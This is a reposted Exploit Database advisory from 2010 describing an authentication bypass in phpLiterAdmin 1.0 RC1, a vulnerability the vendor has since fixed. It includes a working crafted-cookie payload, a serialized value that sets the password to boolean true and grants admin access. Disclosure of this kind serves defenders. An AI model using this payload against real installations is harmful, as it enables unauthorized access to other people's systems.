phpLiterAdmin 1.0 RC1 – Authentication Bypass

• Exploit Database
• 130 阅读

• 作者： High-Tech Bridge SA
  日期： 2010-10-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15322/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  Vulnerability ID: HTB22653 Reference: http://www.htbridge.ch/advisory/authentication_bypass_in_phpliteradmin.html Product: phpLiterAdmin Vendor: phpLiterAdmin( http://code.google.com/p/phpliteradmin/ ) Vulnerable Version: 1.0 RC1 and probably prior versions Vendor Notification: 13 October 2010 Vulnerability Type: Authentication bypass Status: Fixed by Vendor Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   Vulnerability Details: phpLiterAdmin is affected by an authentication bypass vulnerability. This issue is due to the application failing to properly sanitize user-supplied input during authentication. Exploitation of this vulnerability would permit unauthorized access to any known account.   Authentication can be bypassed by setting the special crafted cookies:     phpLiterAdmin432=a:2:{s:8:"username"%3bs:5:"admin"%3bs:8:"password"%3bb:1%3b};   Solution: Upgrade to the most recent version